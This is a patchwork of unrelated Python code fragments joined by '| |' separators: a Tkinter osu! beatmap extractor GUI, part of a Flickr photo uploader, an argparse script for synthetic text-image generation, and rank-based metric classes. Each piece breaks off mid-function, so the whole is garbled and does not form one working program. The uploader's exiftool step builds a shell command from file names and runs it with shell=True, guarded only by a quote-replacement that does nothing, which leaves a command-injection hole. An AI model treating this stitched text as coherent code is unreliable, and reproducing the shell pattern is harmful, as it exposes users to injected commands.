self.btn_Save = ttk.Button(self.frame_1_row_5, text="Save", command=lambda: self.saveConfig())
self.btn_Save.pack(side=RIGHT, padx=5, pady=5)
CreateToolTip(self.btn_Save, "Save current settings so they can be loaded next time")
self.btn_Cancel = ttk.Button(self.frame_1_row_5, text="Cancel", command=lambda: self.cancelConfig())
self.btn_Cancel.pack(side=RIGHT, padx=5, pady=5)
CreateToolTip(self.btn_Cancel, "Cancel any changes and reset to currently saved settings")
self.btn_SetDefault = ttk.Button(self.frame_1_row_5, text="Set Default", command=lambda: self.setDefaultConfig())
self.btn_SetDefault.pack(side=RIGHT, padx=5, pady=5)
CreateToolTip(self.btn_SetDefault, "Reset to default settings")
self.initConfig()
# 2
# Label for map count
self.label_MapCount = Label(self.frame_2_row_1, text="Beatmaps loaded: 0")
self.label_MapCount.pack(side=LEFT, padx=5, pady=5)
# label processed
self.label_Processed = Label(self.frame_2_row_1, text="Processed: 0/0")
self.label_Processed.pack(side=LEFT, padx=5, pady=5)
# entry for filter
# filter label
self.label_Filter = Label(self.frame_2_row_2, text="Filter:")
self.label_Filter.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.label_Filter, "Filter beatmaps by folder/beatmap name")
self.varEntryFilter = StringVar()
self.entry_Filter = ttk.Entry(self.frame_2_row_2, textvariable=self.varEntryFilter, width=30)
self.entry_Filter.pack(side=LEFT, padx=(0, 5), pady=5, fill=X, expand=False)
CreateToolTip(self.entry_Filter, "Filter beatmaps by folder/beatmap name")
# Btn
# Load, extract all, extract selected, clear all, clear selected
self.btn_Load = ttk.Button(self.frame_2_row_2, text="Load Maps", command=lambda: self.loadMaps())
self.btn_Load.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.btn_Load, "Load beatmaps data into table")
self.btn_ExtractAll = ttk.Button(self.frame_2_row_2, text="Extract All", command=lambda: self.extractAll())
self.btn_ExtractAll.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.btn_ExtractAll, "Extract all loaded beatmaps")
self.btn_ExtractSelected = ttk.Button(self.frame_2_row_2, text="Extract Selected", command=lambda: self.extractSelected())
self.btn_ExtractSelected.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.btn_ExtractSelected, "Extract currently selected beatmaps")
self.btn_ClearAll = ttk.Button(self.frame_2_row_2, text="Clear All", command=lambda: self.clearAll())
self.btn_ClearAll.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.btn_ClearAll, "Clear table")
self.btn_ClearSelected = ttk.Button(self.frame_2_row_2, text="Clear Selected", command=lambda: self.clearSelected())
self.btn_ClearSelected.pack(side=LEFT, padx=5, pady=5)
CreateToolTip(self.btn_ClearSelected, "Delete currently selected beatmaps from the table")
self.btn_CancelExtract = ttk.Button(self.frame_2_row_2, text="Cancel/Stop Extract", command=lambda: self.cancelExtract())
self.btn_CancelExtract.pack(side=LEFT, padx=5, pady=5)
# Table for map list
self.scrollbarY = Scrollbar(self.frame_2_row_3, orient=VERTICAL)
self.scrollbarY.pack(side=RIGHT, fill=Y)
# self.scrollbarX = Scrollbar(self.frame_2_row_3, orient=HORIZONTAL)
# self.scrollbarX.pack(side=BOTTOM, fill=X)
self.table_MapList = ttk.Treeview(self.frame_2_row_3, height=10, selectmode="extended", columns=("#", "Name", "Path"))
self.table_MapList.pack(side=LEFT, padx=5, pady=5, fill=BOTH, expand=True)
self.table_MapList.heading("#0", text="", anchor=CENTER)
self.table_MapList.heading("#1", text="#", anchor=CENTER)
self.table_MapList.heading("#2", text="Name", anchor=CENTER)
self.table_MapList.heading("#3", text="Available Extension", anchor=CENTER)
self.table_MapList.column("#0", width=0, stretch=False)
self.table_MapList.column("#1", width=50, stretch=False)
self.table_MapList.column("#2", width=300, stretch=True)
self.table_MapList.column("#3", width=200, stretch=False)
# self.scrollbarX.config(command=self.table_MapList.xview)
self.scrollbarY.config(command=self.table_MapList.yview)
self.table_MapList.config(yscrollcommand=self.scrollbarY.set)
self.table_MapList.bind("<Button-1>", self.handle_click)
# 3
# loadbar
self.loadbar = ttk.Progressbar(self.frame_3_row_1, orient=HORIZONTAL, length=200, mode="determinate")
self.loadbar.pack(side=TOP, fill=BOTH, expand=True)
# For the label
self.processed = 0
self.total = 0
self.cancel = False
# Set logo
try:
self.root.iconbitmap(os.path.join(os.path.dirname(os.path.realpath(__file__)), "logo.ico"))
except Exception:
pass
def cancelExtract(self):
self.cancel = True
def clearAll(self):
# Ask confirmation first
if len(self.table_MapList.get_children()) > 0:
if messagebox.askokcancel("Clear All", "Are you sure you want to clear all loaded beatmaps?"):
self.table_MapList.delete(*self.table_MapList.get_children())
# Update label
self.label_MapCount.config(text="Beatmaps loaded: 0")
self.label_Processed.config(text="Processed: 0/0")
def clearSelected(self):
if len(self.table_MapList.selection()) > 0:
for item in self.table_MapList.selection():
self.table_MapList.delete(item)
self.total -= 1
# Update label
self.label_MapCount.config(text="Beatmaps loaded: {}".format(len(self.table_MapList.get_children())))
self.label_Processed.config(text="Processed: {}/{}".format(self.processed, self.total))
def extractAll(self):
self.cancel = False # reset cancel
# Check if osu exist in path or not
if not os.path.exists(self.entry_OsuPath.get()) or "osu!.exe" not in os.listdir(self.entry_OsuPath.get()):
messagebox.showwarning("Warning", "Couldn't find osu!.exe in path provided.", parent=self.root)
# show warning and ask confirmation to procceed or not
if not messagebox.askokcancel("Warning", "Seems like your Osu! path is incorrect, we couldn't find osu!.exe in the path.\nDo you still want to continue?", parent=self.root):
return
# | |
# -------------------------------------------------------------------------
# convert_raw_file
#
# Converts a RAW file into JPG. Also copies tags from RAW file.
# Uses external exiftool.
#
def convert_raw_file(self, a_dirpath, a_fname, a_fext, a_fbasename):
""" convert_raw_file
a_dirpath = dirpath folder for filename
a_fname = filename (including extension)
a_fext = lower case extension of current file
a_fbasename = filiename without extension
"""
# ---------------------------------------------------------------------
# convert_raw_file_cmd
#
# Prepare and executes the command for RAW file conversion.
#
def convert_raw_file_cmd(convert_or_copy_tags):
""" convert_raw_file_cmd
convert_or_copy_tags = 'Convert' converts a raw file to JPG
'CopyTags' copy tags from raw file to JPG
"""
assert convert_or_copy_tags in ['Convert', 'CopyTags'],\
NP.niceassert('convert_raw_file_cmd: wrong argument:[{!s}]'
.format(convert_or_copy_tags))
result_cmd = True
if convert_or_copy_tags == 'Convert':
flag = "-PreviewImage" \
if a_fext == 'cr2' else "-JpgFromRaw"
command = os.path.join(
NP.strunicodeout(self.xcfg.RAW_TOOL_PATH), 'exiftool') +\
" -b " + flag + " -w .JPG -ext " + a_fext + " -r " +\
"'" + os.path.join(NP.strunicodeout(a_dirpath),
NP.strunicodeout(a_fname)) + "'"
elif convert_or_copy_tags == 'CopyTags':
command = os.path.join(
NP.strunicodeout(self.xcfg.RAW_TOOL_PATH), 'exiftool') +\
" -overwrite_original_in_place -tagsfromfile " +\
"'" + os.path.join(NP.strunicodeout(a_dirpath),
NP.strunicodeout(a_fname)) + "'" +\
" -r -all:all -ext JPG " +\
"'" + os.path.join(NP.strunicodeout(a_dirpath),
NP.strunicodeout(a_fbasename)) + ".JPG'"
else:
# Nothing to do
return False
logging.info(command)
try:
p_cmd = subprocess.call(command, shell=True)
except Exception:
NP.niceerror(caught=True,
caughtprefix='+++',
caughtcode='030',
caughtmsg='Error calling exiftool:[{!s}]'
.format(convert_or_copy_tags),
useniceprint=True,
exceptsysinfo=True)
result_cmd = False
finally:
if p_cmd is None:
del p_cmd
return result_cmd
# ---------------------------------------------------------------------
if self.args.dry_run:
return True
NP.niceprint(' Converting raw:[{!s}]'
.format(NP.strunicodeout(os.path.join(a_dirpath,
a_fname))),
logalso=logging.INFO)
success = False
# file_ext = a_fname's extension (without the ".")
file_ext = os.path.splitext(a_fname)[-1][1:].lower()
assert NP.strunicodeout(a_fext) == NP.strunicodeout(file_ext),\
NP.niceassert('File extensions differ:[{!s}]!=[{!s}]'
.format(NP.strunicodeout(a_fext),
NP.strunicodeout(file_ext)))
if not os.path.exists(os.path.join(a_dirpath, a_fbasename) + ".JPG"):
logging.info('.....Create JPG:[%s] jpg:[%s] ext:[%s]',
NP.strunicodeout(a_fname),
NP.strunicodeout(a_fbasename),
NP.strunicodeout(file_ext))
if convert_raw_file_cmd('Convert'):
NP.niceprint('....Created JPG:[{!s}]'
.format(NP.strunicodeout(a_fbasename) + ".JPG"))
else:
NP.niceprint('.....raw failed:[{!s}]'.format(a_fname))
return success
else:
NP.niceprint('raw: JPG exists:[{!s}]'
.format(NP.strunicodeout(a_fbasename) + ".JPG"),
logalso=logging.WARNING)
return success
if os.path.exists(NP.strunicodeout(
os.path.join(a_dirpath, a_fbasename)) + ".JPG"):
NP.niceprint('...Copying tags:[{!s}]'
.format(NP.strunicodeout(a_fname)))
if convert_raw_file_cmd('CopyTags'):
NP.niceprint('....Copied tags:[{!s}]'
.format(NP.strunicodeout(a_fname)))
else:
NP.niceprint('raw tags failed:[{!s}]'.format(a_fname))
return success
else:
NP.niceprint('.....raw failed:[{!s}]'.format(a_fname),
logalso=logging.WARNING)
return success
success = True
NP.niceprint(' Converted raw:[{!s}]'
.format(NP.strunicodeout(a_fname)),
logalso=logging.INFO)
return success
# -------------------------------------------------------------------------
# grab_newfiles
#
# Select files and RAW files from FILES_DIR to be uploaded
#
def grab_newfiles(self):
""" grab_newfiles
Select files from FILES_DIR taking into consideration
EXCLUDED_FOLDERS and IGNORED_REGEX filenames.
Returns two sorted file lists:
JPG files found
RAW files found (if RAW conversion option is enabled)
"""
files = []
rawfiles = []
for dirpath, dirnames, filenames in\
os.walk(self.xcfg.FILES_DIR, followlinks=True):
# Prevent walking thru files in the list of EXCLUDED_FOLDERS
# Reduce time by not checking a file in an excluded folder
logging.debug('Check for UnicodeWarning comparison '
'dirpath:[%s] type:[%s]',
NP.strunicodeout(os.path.basename(
os.path.normpath(dirpath))),
type(os.path.basename(
os.path.normpath(dirpath))))
if os.path.basename(os.path.normpath(dirpath)) \
in self.xcfg.EXCLUDED_FOLDERS:
dirnames[:] = []
filenames[:] = []
logging.info('Folder [%s] on path [%s] excluded.',
NP.strunicodeout(os.path.basename(
os.path.normpath(dirpath))),
NP.strunicodeout(os.path.normpath(dirpath)))
for afile in filenames:
file_path = os.path.join(NP.strunicodeout(dirpath),
NP.strunicodeout(afile))
# Ignore filenames wihtin IGNORED_REGEX
if any(ignored.search(afile)
for ignored in self.xcfg.IGNORED_REGEX):
logging.debug('File:[%s] in IGNORED_REGEX:',
NP.strunicodeout(file_path))
continue
ext = os.path.splitext(os.path.basename(afile))[1][1:].lower()
if ext in self.xcfg.ALLOWED_EXT:
filesize = os.path.getsize(os.path.join(
NP.strunicodeout(dirpath), NP.strunicodeout(afile)))
if filesize < self.xcfg.FILE_MAX_SIZE:
files.append(
os.path.normpath(
NP.strunicodeout(dirpath) +
NP.strunicodeout("/") +
NP.strunicodeout(afile).replace("'", "\'")))
else:
NP.niceprint('Skipping file due to '
'size restriction: [{!s}]'.format(
os.path.normpath(
NP.strunicodeout(dirpath) +
NP.strunicodeout('/') +
NP.strunicodeout(afile))))
# Assumes xCFG.ALLOWED_EXT and xCFG.RAW_EXT are disjoint
elif (self.xcfg.CONVERT_RAW_FILES and
(ext in self.xcfg.RAW_EXT)):
if not os.path.exists(
os.path.join(
NP.strunicodeout(dirpath),
NP.strunicodeout(os.path.splitext(afile)[0])) +
".JPG"):
logging.debug('rawfiles: including:[%s]',
NP.strunicodeout(afile))
rawfiles.append(
os.path.normpath(
NP.strunicodeout(dirpath) +
NP.strunicodeout("/") +
NP.strunicodeout(afile).replace("'", "\'")))
else:
logging.warning('rawfiles: JPG exists. '
'Not including:[%s]',
NP.strunicodeout(afile))
rawfiles.sort()
files.sort()
if not self.args.mask_sensitive:
NP.niceprint('Pretty Print Output for [files]-------\n{!s}'
.format(pprint.pformat(files)),
verbosity=3,
logalso=logging.DEBUG)
NP.niceprint('Pretty Print Output for [rawfiles]-------\n{!s}'
.format(pprint.pformat(rawfiles)),
verbosity=3,
logalso=logging.DEBUG)
else:
NP.niceprint('Masking enabled: Pretty Print Output for '
'[files]/[rawfiles] disabled!',
verbosity=3,
logalso=logging.DEBUG)
return files, rawfiles
# -------------------------------------------------------------------------
# is_file_excluded
#
# Check if a filename is within the list of EXCLUDED_FOLDERS. Returns:
# True = if filename's folder is within one of the EXCLUDED_FOLDERS
# False = if filename's folder not on one of the EXCLUDED_FOLDERS
#
def is_file_excluded(self, filename):
""" is_file_excluded
Returns True if a file is within an EXCLUDED_FOLDERS directory/folder
"""
for excluded_dir in self.xcfg.EXCLUDED_FOLDERS:
logging.debug('type(excluded_dir):[%s]', type(excluded_dir))
logging.debug('is excluded_dir unicode?[%s]',
NP.is_str_unicode(excluded_dir))
logging.debug('type(filename):[%s]', type(filename))
logging.debug('is filename unicode?[{%s]',
NP.is_str_unicode(filename))
logging.debug('is os.path.dirname(filename) unicode?[%s]',
NP.is_str_unicode(os.path.dirname(filename)))
logging.debug('excluded_dir:[%s] filename:[%s]',
NP.strunicodeout(excluded_dir),
NP.strunicodeout(filename))
# Now everything should be in Unicode
if excluded_dir in os.path.dirname(filename):
logging.debug('Returning is_file_excluded:[True]')
return True
logging.debug('Returning is_file_excluded:[False]')
return False
# -------------------------------------------------------------------------
# update_video_date
#
# Update the video date taken based on last_modified time of file
#
def update_video_date(self, xfile_id, xfile, xlast_modified):
""" update_video_date
Update the video date taken based on last_modified time of file
"""
# Update Date/Time on Flickr for Video files
# Flickr doesn't read it from the video file itself.
filetype = mimetypes.guess_type(xfile)
logging.info('filetype is:[%s]',
'None'
if filetype is None
else filetype[0])
# update video date/time TAKEN.
# Flickr doesn't read it from the video file itself.
if (not filetype[0] is None) and ('video' in filetype[0]):
res_set_date = None
video_date = NUTIME.strftime('%Y-%m-%d %H:%M:%S',
NUTIME.localtime(xlast_modified))
NP.niceprint(' Setting Date:[{!s}] for file:[{!s}] Id=[{!s}]'
.format(video_date,
NP.strunicodeout(xfile),
xfile_id),
verbosity=1,
logalso=logging.INFO)
res_set_date = self.photos_set_dates(xfile_id,
str(video_date))
if faw.is_good(res_set_date):
NP.niceprint('Successful date:[{!s}] '
'for file:[{!s}]'
.format(NP.strunicodeout(video_date),
NP.strunicodeout(xfile)))
return True
# -------------------------------------------------------------------------
# mp_upload_file
#
# upload_file wrapper for multiprocessing purposes
#
def mp_upload_file(self, lock, running, mutex, filelist, ctotal, cur):
""" mp_upload_file
Wrapper function for multiprocessing support to call upload_file
with a chunk of the files.
lock = for database access control in multiprocessing
running = shared value to count processed files in multiprocessing
mutex = for running access control in multiprocessing
"""
# CODING pylint
# pylint: disable=unused-argument
for i, filepic in enumerate(filelist):
logging.warning('===Element of Chunk:[%s] file:[%s]', i, filepic)
self.upload_file(lock, filepic)
# no need to check for
# (self.args.processes and self.args.processes > 0):
# as mp_upload_file is already multiprocessing
logging.debug('===Multiprocessing=== in.mutex.acquire(w)')
mutex.acquire()
running.value += 1
xcount = running.value
mutex.release()
logging.warning('===Multiprocessing=== out.mutex.release(w)')
# Show number of files processed so far
NP.niceprocessedfiles(xcount, ctotal, False)
# -------------------------------------------------------------------------
# upload_file
#
# uploads a file into flickr
# lock = parameter for multiprocessing control of access to DB.
# (if self.args.processes = 0 then lock can be None
# as it is not used)
# file = file to be uploaded
#
def upload_file(self, lock, file):
""" upload_file
uploads file into flickr
May run in single or multiprocessing mode
lock = parameter for multiprocessing control of access to DB.
(if self.args.processes = 0 then lock may be None
as it is not used)
file = file to be uploaded
"""
# ---------------------------------------------------------------------
# db_insert_files
#
def db_insert_files(lock,
file_id, file, file_checksum, last_modified):
""" db_insert_files
Insert into local DB files table.
lock = for multiprocessing access control to DB
file_id = pic id
file = filename
file_checksum = md5 checksum
last_modified = Last modified time
"""
# Database Locked is returned often on this INSERT
# Will try MAX_SQL_ATTEMPTS...
attempts = None
for attempts in range(0, self.xcfg.MAX_SQL_ATTEMPTS):
logging.info('db_insert_files: Start:[%s/%s attempts].',
attempts,
self.xcfg.MAX_SQL_ATTEMPTS)
db_success = litedb.execute(
con, 'INSERT#030', lock, self.args.processes,
cur,
'INSERT INTO files '
'(files_id, path, md5, last_modified, tagged) '
'VALUES (?, ?, ?, ?, 1)',
qmarkargs=(file_id, file, file_checksum, last_modified),
dbcaughtcode='031')
if not db_success:
NP.niceerror(caught=True,
caughtprefix='+++ DB',
caughtcode='032',
caughtmsg='Sleep 2 and retry SQL...'
'[{!s}/{!s} attempts]'
.format(attempts, self.xcfg.MAX_SQL_ATTEMPTS),
useniceprint=True)
NUTIME.sleep(2)
elif attempts > 0:
NP.niceerror(caught=True,
caughtprefix='+++ DB',
caughtcode='033',
caughtmsg='Succeed at retry SQL...'
'[{!s}/{!s} attempts]'
.format(attempts,
self.xcfg.MAX_SQL_ATTEMPTS),
useniceprint=True)
logging.info('db_insert_files: Done:[%s/%s attempts].',
attempts,
self.xcfg.MAX_SQL_ATTEMPTS)
# Break the cycle of SQL_ATTEMPTS and continue
break
# ---------------------------------------------------------------------
# ---------------------------------------------------------------------
# db_insert_badfiles
#
def db_insert_badfiles(lock,
file, file_checksum, last_modified):
""" db_insert_badfiles
Insert into local DB Bad files table.
lock = for multiprocessing access control to DB
file = filename
file_checksum = md5 checksum
last_modified = Last modified time
"""
litedb.execute(con, 'INSERT#035', lock, self.args.processes,
cur,
'INSERT INTO badfiles '
'(path, md5, last_modified, tagged) '
'VALUES (?, ?, ?, 1)',
qmarkargs=(file, file_checksum, last_modified),
dbcaughtcode='035')
# ---------------------------------------------------------------------
if self.args.dry_run:
NP.niceprint(' Dry Run file:[{!s}]...'
.format(NP.strunicodeout(file)))
return True
NP.niceprint(' Checking file:[{!s}]...'
.format(NP.strunicodeout(file)),
verbosity=1)
setname = faw.set_name_from_file(file,
self.xcfg.FILES_DIR,
self.xcfg.FULL_SET_NAME)
success = False
con, cur = litedb.connect(self.xcfg.DB_PATH)
litedb.execute(con, 'SELECT#036', lock, self.args.processes,
cur,
'SELECT rowid, files_id, path, set_id, md5, '
'tagged, last_modified | |
import argparse
import os, errno
import random as rnd
import string
import sys
import csv
import cv2
from tqdm import tqdm
from string_generator import (
create_strings_from_dict,
create_strings_from_file,
create_strings_from_wikipedia,
create_strings_randomly
)
from data_generator import FakeTextDataGenerator
from multiprocessing import Pool
def margins(margin):
margins = margin.split(',')
if len(margins) == 1:
return [margins[0]] * 4
return [int(m) for m in margins]
def parse_arguments():
"""
Parse the command line arguments of the program.
"""
parser = argparse.ArgumentParser(description='Generate synthetic text data for text recognition.')
parser.add_argument(
"--output_dir",
type=str,
nargs="?",
help="The output directory",
default="out/",
)
parser.add_argument(
"-i",
"--input_file",
type=str,
nargs="?",
help="When set, this argument uses a specified text file as source for the text",
default=""
)
parser.add_argument(
"-l",
"--language",
type=str,
nargs="?",
help="The language to use, should be fr (French), en (English), es (Spanish), de (German), or cn (Chinese).",
default="en"
)
parser.add_argument(
"-c",
"--count",
type=int,
nargs="?",
help="The number of images to be created.",
default=1000
)
parser.add_argument(
"-rs",
"--random_sequences",
action="store_true",
help="Use random sequences as the source text for the generation. Set '-let','-num','-sym' to use letters/numbers/symbols. If none specified, using all three.",
default=False
)
parser.add_argument(
"-let",
"--include_letters",
action="store_true",
help="Define if random sequences should contain letters. Only works with -rs",
default=False
)
parser.add_argument(
"-num",
"--include_numbers",
action="store_true",
help="Define if random sequences should contain numbers. Only works with -rs",
default=False
)
parser.add_argument(
"-sym",
"--include_symbols",
action="store_true",
help="Define if random sequences should contain symbols. Only works with -rs",
default=False
)
parser.add_argument(
"-w",
"--length",
type=int,
nargs="?",
help="Define how many words should be included in each generated sample. If the text source is Wikipedia, this is the MINIMUM length",
default=1
)
parser.add_argument(
"-r",
"--random",
action="store_true",
help="Define if the produced string will have variable word count (with --length being the maximum)",
default=False
)
parser.add_argument(
"-f",
"--format",
type=int,
nargs="?",
help="Define the height of the produced images if horizontal, else the width",
default=32,
)
parser.add_argument(
"-t",
"--thread_count",
type=int,
nargs="?",
help="Define the number of thread to use for image generation",
default=1,
)
parser.add_argument(
"-e",
"--extension",
type=str,
nargs="?",
help="Define the extension to save the image with",
default="jpg",
)
parser.add_argument(
"-k",
"--skew_angle",
type=int,
nargs="?",
help="Define skewing angle of the generated text. In positive degrees",
default=0,
)
parser.add_argument(
"-rk",
"--random_skew",
action="store_true",
help="When set, the skew angle will be randomized between the value set with -k and it's opposite",
default=False,
)
parser.add_argument(
"-wk",
"--use_wikipedia",
action="store_true",
help="Use Wikipedia as the source text for the generation, using this parameter ignores -r, -n, -s",
default=False,
)
parser.add_argument(
"-bl",
"--blur",
type=float,
nargs="?",
help="Apply gaussian blur to the resulting sample. Should be an integer defining the blur radius",
default=0,
)
parser.add_argument(
"-rbl",
"--random_blur",
action="store_true",
help="When set, the blur radius will be randomized between 0 and -bl.",
default=False,
)
parser.add_argument(
"-b",
"--background",
type=int,
nargs="?",
help="Define what kind of background to use. 0: Gaussian Noise, 1: Plain white, 2: Quasicrystal, 3: Pictures",
default=0,
)
parser.add_argument(
"-hw",
"--handwritten",
action="store_true",
help="Define if the data will be \"handwritten\" by an RNN",
)
parser.add_argument(
"-na",
"--name_format",
type=int,
help="Define how the produced files will be named. 0: [TEXT]_[ID].[EXT], 1: [ID]_[TEXT].[EXT] 2: [ID].[EXT] + one file labels.txt containing id-to-label mappings",
default=0,
)
parser.add_argument(
"-d",
"--distorsion",
type=int,
nargs="?",
help="Define a distorsion applied to the resulting image. 0: None (Default), 1: Sine wave, 2: Cosine wave, 3: Random",
default=0
)
parser.add_argument(
"-do",
"--distorsion_orientation",
type=int,
nargs="?",
help="Define the distorsion's orientation. Only used if -d is specified. 0: Vertical (Up and down), 1: Horizontal (Left and Right), 2: Both",
default=0
)
parser.add_argument(
"-wd",
"--width",
type=int,
nargs="?",
help="Define the width of the resulting image. If not set it will be the width of the text + 10. If the width of the generated text is bigger that number will be used",
default=-1
)
parser.add_argument(
"-al",
"--alignment",
type=int,
nargs="?",
help="Define the alignment of the text in the image. Only used if the width parameter is set. 0: left, 1: center, 2: right",
default=1
)
parser.add_argument(
"-or",
"--orientation",
type=int,
nargs="?",
help="Define the orientation of the text. 0: Horizontal, 1: Vertical",
default=0
)
parser.add_argument(
"-tc",
"--text_color",
type=str,
nargs="?",
help="Define the text's color, should be either a single hex color or a range in the ?,? format.",
default='#282828'
)
parser.add_argument(
"-sw",
"--space_width",
type=float,
nargs="?",
help="Define the width of the spaces between words. 2.0 means twice the normal space width",
default=1.0
)
parser.add_argument(
"-m",
"--margins",
type=margins,
nargs="?",
help="Define the margins around the text when rendered. In pixels",
default=(5, 5, 5, 5)
)
parser.add_argument(
"-fi",
"--fit",
action="store_true",
help="Apply a tight crop around the rendered text",
default=False
)
parser.add_argument(
"-ft",
"--font",
type=str,
nargs="?",
help="Define font to be used"
)
parser.add_argument(
"-ca",
"--case",
type=str,
nargs="?",
help="Generate upper or lowercase only. arguments: upper or lower. Example: --case upper"
)
return parser.parse_args()
def load_dict(lang):
"""
Read the dictionary file and returns all words in it.
"""
lang_dict = []
with open(os.path.join('dicts', lang + '.txt'), 'r', encoding="utf8", errors='ignore') as d:
lang_dict = [l for l in d.read().splitlines() if len(l) > 0]
return lang_dict
def extract_from_dic(lang_dict, word_vec):
"""
Das
"""
# sorted_dic = sorted(lang_dict, key=lambda line: len(line), reverse=False)
shuffled_dic = lang_dict[:]
rnd.shuffle(shuffled_dic)
sentence = ' '
for _ in word_vec:
for w in shuffled_dic:
if len(w) is _:
sentence += w
break
return sentence
def load_fonts(lang):
"""
Load all fonts in the fonts directories
"""
if lang == 'cn':
return [os.path.join('fonts/cn', font) for font in os.listdir('fonts/cn')]
else:
return [os.path.join('fonts/latin', font) for font in os.listdir('fonts/latin')]
def alpha_sort(file):
"""
Rewrites csv sorting row according to the GT values, alphabetically.
"""
with open(file, encoding="utf8", errors='ignore') as csvFile:
reader = csv.reader(csvFile)
headers = next(reader, None)
sorted_list = sorted(reader, key=lambda row: row[0].lower(), reverse=False)
# for index, column in enumerate(sorted_list):
# print(column)
with open(file, 'w', encoding="utf8", errors='ignore') as csvFile:
writer = csv.writer(csvFile)
writer.writerow(headers)
writer.writerows(sorted_list)
return
def sentence2wordlen(sentences):
"""
1. Takes in the sentence and outputs a vector with the length of every word in it.
2. Splits target and from sentence and returns mod version.
"""
wordlen, targets = [], []
sentencesNT = [] # sentences with no target
for sentence in sentences:
word_vec = sentence.split() # split to words
targets.append(word_vec.pop()) # set last word as target
word_len1sen = []
sentence = ' '.join(word_vec) # reassemble the word w/o target
for word in word_vec:
word_len1sen.append(len(word))
wordlen.append(word_len1sen)
sentencesNT.append(sentence)
fileout = 'Wordcount_record.csv'
with open(fileout, 'w', encoding="utf-8_sig") as csvFile:
writer = csv.writer(csvFile)
for _ in wordlen:
sentence = sentencesNT[wordlen.index(_)]
_.insert(0, sentence)
_.insert(1, targets[wordlen.index(_)])
_.insert(2, len(sentence))
writer.writerow(_)
return sentencesNT
def randomize_sentence(file):
"""
As name implies it generates a random sentence of a given length
"""
with open(file, 'r', encoding="utf-8_sig") as csvFile:
read_dt = list(csv.reader(csvFile))
random_sentences = []
target_strings = []
for row in read_dt:
target_strings.append(row[1]) # take last word for now => rnd.randint
print(row[0], ' ', len(row[0]), ' target lc', row[1][-1])
sentence = ''
for i in range(3, len(row)):
wl = int(row[i])
res = ''.join(rnd.choices(string.ascii_uppercase + string.ascii_lowercase + string.digits, k=wl))
sentence += res
sentence += ' '
sentence = sentence[:-1] # remove the last space
random_sentences.append(sentence)
print(sentence, ' ', len(sentence), os.linesep)
return random_sentences, target_strings
def generate_random_get_targets(sentences):
"""
1. Takes in the sentence and outputs a vector with the length of every word in it.
2. Splits target and from sentence and returns both; mod version and target array.
"""
lang_dic = []
with open(os.path.join('dicts', 'google_en.txt'), 'r', encoding="utf8", errors='ignore') as d:
lang_dic = [l for l in d.read().splitlines() if len(l) > 0]
# shuffle_dict = lang_dict[:]
wordlen, targets = [], []
sentencesNT = [] # sentences with no target
for sentence in sentences:
word_vec = sentence.split() # split to words
targets.append(' ' + word_vec.pop()) # set last word as target
word_len1sen = []
sentence = ' '.join(word_vec) # reassemble the word w/o target
for word in word_vec:
word_len1sen.append(len(word))
wordlen.append(word_len1sen)
sentencesNT.append(sentence)
random_sentences = [] # random sentences
for sentence in sentencesNT:
index = sentencesNT.index(sentence)
word_len1sen = wordlen[index]
rnd_sentence = ''
for _ in word_len1sen: # shuffle_dict:
# rnd.shuffle(shuffle_dict)
rnd_word = rnd.choice(lang_dic)
while len(rnd_word) != _:
rnd_word = rnd.choice(lang_dic)
rnd_sentence += rnd_word + ' '
# wl = int(_) # consider this part if using random strings instead of words
# res = ''.join(rnd.choices(string.ascii_uppercase + string.ascii_lowercase + string.digits, k=wl))
| |
from precomputed cumulative sums and aggregate
x = x[num_candidates - 1] - np.log(num_candidates)
return np.exp(x.sum())
@parse_docdata
class InverseGeometricMeanRank(RankBasedMetric):
"""The inverse geometric mean rank.
---
link: https://arxiv.org/abs/2203.07544
description: The inverse of the geometric mean over all ranks.
"""
name = "Inverse Geometric Mean Rank (IGMR)"
value_range = ValueRange(lower=0, lower_inclusive=False, upper=1, upper_inclusive=True)
increasing = True
synonyms: ClassVar[Collection[str]] = ("igmr",)
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return np.reciprocal(stats.gmean(ranks)).item()
@parse_docdata
class HarmonicMeanRank(RankBasedMetric):
"""The harmonic mean rank.
---
link: https://arxiv.org/abs/2203.07544
description: The harmonic mean over all ranks.
"""
name = "Harmonic Mean Rank (HMR)"
value_range = ValueRange(lower=1, lower_inclusive=True, upper=math.inf)
increasing = False
synonyms: ClassVar[Collection[str]] = ("hmr",)
def __call__(self, ranks: np.ndarray, num_candidates: Optional[np.ndarray] = None) -> float: # noqa: D102
return stats.hmean(ranks).item()
def generalized_harmonic_numbers(n: int, p: int = -1) -> np.ndarray:
r"""
Calculate the generalized harmonic numbers from 1 to n (both inclusive).
.. math::
H_p(n) = \sum \limits_{i=1}^{n} i^{-p}
:param n:
the maximum number for which the generalized harmonic numbers are calculated
:param p:
the power, typically negative
:return: shape: (n,)
the first $n$ generalized harmonic numbers
.. seealso::
https://en.wikipedia.org/wiki/Harmonic_number#Generalizations
"""
return np.cumsum(np.power(np.arange(1, n + 1, dtype=float), p))
def harmonic_variances(n: int) -> np.ndarray:
r"""
Pre-calculate variances of inverse rank distributions.
With
.. math::
H_p(n) = \sum \limits_{i=1}^{n} i^{-p}
denoting the generalized harmonic numbers, and abbreviating $H(n) := H_1(n)$, we have
.. math::
\textit{V}[n]
&= \frac{1}{n} \sum \limits_{i=1}^n \left( i^{-1} - \frac{H(n)}{n} \right)^2 \\
&= \frac{n \cdot H_2(n) - H(n)^2}{n^2}
:param n:
the maximum rank number
:return: shape: (n+1,)
the variances for the discrete uniform distribution over $\{\frac{1}{1}, \dots, \frac{1}{k}\}$`
"""
h = generalized_harmonic_numbers(n)
h2 = generalized_harmonic_numbers(n, p=-2)
n = np.arange(1, n + 1)
v = (n * h2 - h**2) / n**2
return v
@parse_docdata
class InverseHarmonicMeanRank(RankBasedMetric):
r"""The inverse harmonic mean rank.
Let
.. math::
H_m(n) = \sum \limits_{i=1}^{n} i^{-m}
denote the generalized harmonic number, with $H(n) := H_{1}(n)$ for brevity.
Thus, we have
.. math::
\mathbb{E}\left[r_i^{-1}\right] = \frac{H(N_i)}{N_i}
and hence
.. math::
\mathbb{E}\left[\textrm{MRR}\right]
&= \mathbb{E}\left[\frac{1}{n} \sum \limits_{i=1}^n r_i^{-1}\right] \\
&= \frac{1}{n} \sum \limits_{i=1}^n \mathbb{E}\left[r_i^{-1}\right] \\
